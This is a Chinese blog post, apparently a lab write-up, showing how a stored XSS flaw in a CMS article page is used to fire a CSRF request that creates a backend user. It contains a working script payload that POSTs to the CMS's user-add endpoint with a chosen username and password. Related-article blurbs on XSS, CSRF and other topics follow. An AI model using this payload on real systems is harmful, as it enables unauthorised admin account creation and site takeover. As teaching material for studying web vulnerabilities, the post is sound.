CSRF漏洞与XSS相结合创建后台用户

最新推荐文章于 2024-06-29 14:23:06 发布
最新推荐文章于 2024-06-29 14:23:06 发布
阅读量149 收藏
点赞数 1
分类专栏: CSRF漏洞 文章标签: 学习方法 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42786460/article/details/132604527
版权
1 进入用户登录页面
		获取到创建用户的接口地址,以及抓取到用户和密码的字段形参
		![在这里插入图片描述](https://img-blog.csdnimg.cn/8790334430134e318d6662399a7cba0f.png)

2 抓取的到包信息

1 [
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://192.168.225.165/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=weiwei&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

2 进行修改

在这里插入图片描述

3 进入发表文章页面,进行发表文章,此页面有XSS漏洞,可以执行script标签

将修改好的上面的代码拷贝到留言内容中,点击提交,后台创建了新用户

在这里插入图片描述

4 执行后台创建了新用户

在这里插入图片描述

5 验证查看,已留言成功

在这里插入图片描述

6 查看是否添加新用户,用户添加OK

在这里插入图片描述

煜磊
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习 xss+csrf 组合拳
weixin_67259816的博客
05-28 2876
该篇文章记录了xss+csrf的组合拳,无论是存储型xss还是反射型xsscsrf结合在一块,都会有一个更强大的收获。
xss结合csrf实验】
一纸荒芜的博客
09-07 1772
通常xss漏洞可以和csrf漏洞结合使用,今天就做一个小的实验举例,漏洞主要利用的是用户修改敏感信息的未退出状态,并且修改信息不需要验证时很容易被伪造,当我们发现存在csrf漏洞时,可构造url请求信息,配合xss漏洞去配合诱导访问。本实验由本地搭建的pikachu靶场做演示。 本期简单介绍了xss漏洞csrf漏洞的配合使用。
CSRF漏洞详解
渗透测试研究中心
06-10 915
0x01 CSRF定义   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。尽管听起来像跨站脚本XSS,但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流...
Csrf+Xss组合拳
蚁景网安学院
07-27 891
各位大师傅,第一次在合天发文章,请多多关照今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难...
实战审计cms之CSRF——CSRF+Xss+Flash钓鱼
hackzkaq的博客
05-18 528
更多渗透技能 欢迎搜索公众号:白帽子左一 作者:掌控安全-holic 前言 CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf 然后cnvd跟我说不收csrf后台存储xss,自此后台我从不找xsscsrf 但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk 0x01 CSRF介绍 CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造 CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操
XSS+CSRF组合拳
weixin_50464560的博客
03-12 2340
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储型 XSS + CSRF(存储型 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
XSSCSRF 与 SQL注入
qq_40821997的博客
06-05 389
跨站请求伪造(Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF,是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。flask 模仿csrf攻击 与 保护:https://www.cnblogs.com/love2000/p/13678360.html(1)场景一(2)场景二跨站请求可以用什么方式:CSRF常见的攻击类型: (1)GET类型的CSRF(2)
XSSCSRF两种跨站攻击总结
02-26
在那个年代,大家一般用拼接字符串的方式...但最近又听说了另一种跨站攻击CSRF,于是找了些资料了解了一下,并与XSS放在一起做个比较。XSS全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是
CSRFTester:一款CSRF漏洞安全测试工具
02-26
CSRFTester:一款CSRF漏洞安全测试工具CSRFTester是一款CSRF漏洞的测试工具,讲工具之前,先大概介绍一下CSRF漏洞CSRF英文全称是CrossSiteRequestForgery,常被叫做跨站点伪造请求,是伪造客户端请求的一种攻击...
Web应用程序常见漏洞CSRF的入侵检测与防范
03-01
互联网的安全问题一直存在,并且在可预见的未来中没有消弭的迹象...跨站请求伪造(CSRF)的是Web应用程序一种常见的漏洞,其攻击特性是危害性大但非常隐蔽,尤其是在大量Web2.0技术的应用的背景下,CSRF攻击完全可以在
hucart-含有CSRF漏洞的源码.zip
12-31
hucart-含有CSRF漏洞的源码,亲测真实有效可用,如有侵权,请联系CSDN管理员删除
[word] Word如何删除所有的空行? #职场发展#学习方法
2401_82731322的博客
06-25 266
很多网友从网页复制文字粘贴到word文档后发现段落之间有空行,如果文字不多,手动删除这些空行也没有多少工作量,但是如果文字的字数达到成千上万,一个个手动删除这些空行还是很繁琐的。那么,有没有什么简单的方法可以快速删除word文档中所有的空行呢?第一步:用WPS打开目标word文档(如果电脑没有安装,请点击wps office下载),点击工具栏的『开始』键,再点击『文字工具』键,最后点击其下的『删除空段(E)』;第二步:完成上步操作后,word中所有空行已经被删除。Word如何删除所有的空行?
机器人自主学习方法学习
weixin_71113035的博客
06-26 596
机器人自主学习方法学习
问题:1、金属基复合材料界面的物理结合是指 #学习方法#媒体
2401_82731080的博客
06-25 264
B.是一种纯的物理作用,与化学作用无关,即无化学键力存在,但有范德华力存在。D.是一种纯的物理作用,既无化学键力存在,又无范德华力存在。A.与化学作用有关,既有化学键力存在,又有范德华力存在。C.与化学作用无关,但有化学键力和范德华力存在。问题:1、金属基复合材料界面的物理结合是指。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8303
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 203
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户
SET加密:电子商务安全的基石
最新发布
jiamisoft的博客
06-29 353
SET协议,全称安全电子交易协议,是由Visa和MasterCard两大信用卡组织联合国际上多家科技机构共同制定的,旨在保障基于银行卡的在线交易安全。该协议结合了公钥密码体制和X.509数字证书标准,通过制定标准和采用各种密码技术手段,解决了电子商务发展中的安全问题。SET协议已经获得IETF标准的认可,成为事实上的工业标准。
NAS安全存储怎样实现更精细的数据权限管控?
文件数据安全交换
06-25 543
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。3)文件的审批与安检。
CSRF 漏洞XSS 漏洞的区别
03-22
CSRF 漏洞XSS 漏洞都是 Web 应用程序中常见的安全漏洞,但它们的攻击方式和影响范围不同。CSRF 漏洞是指攻击者利用用户已经登录的身份,在用户不知情的情况下,向 Web 应用程序发送恶意请求,从而执行某些操作,比如修改用户信息、发表评论等。而 XSS 漏洞则是指攻击者通过注入恶意脚本代码,使得用户在浏览器中执行这些代码,从而实现窃取用户信息、劫持用户会话等攻击目的。总的来说,CSRF 漏洞主要是利用用户身份,而 XSS 漏洞则是利用浏览器漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值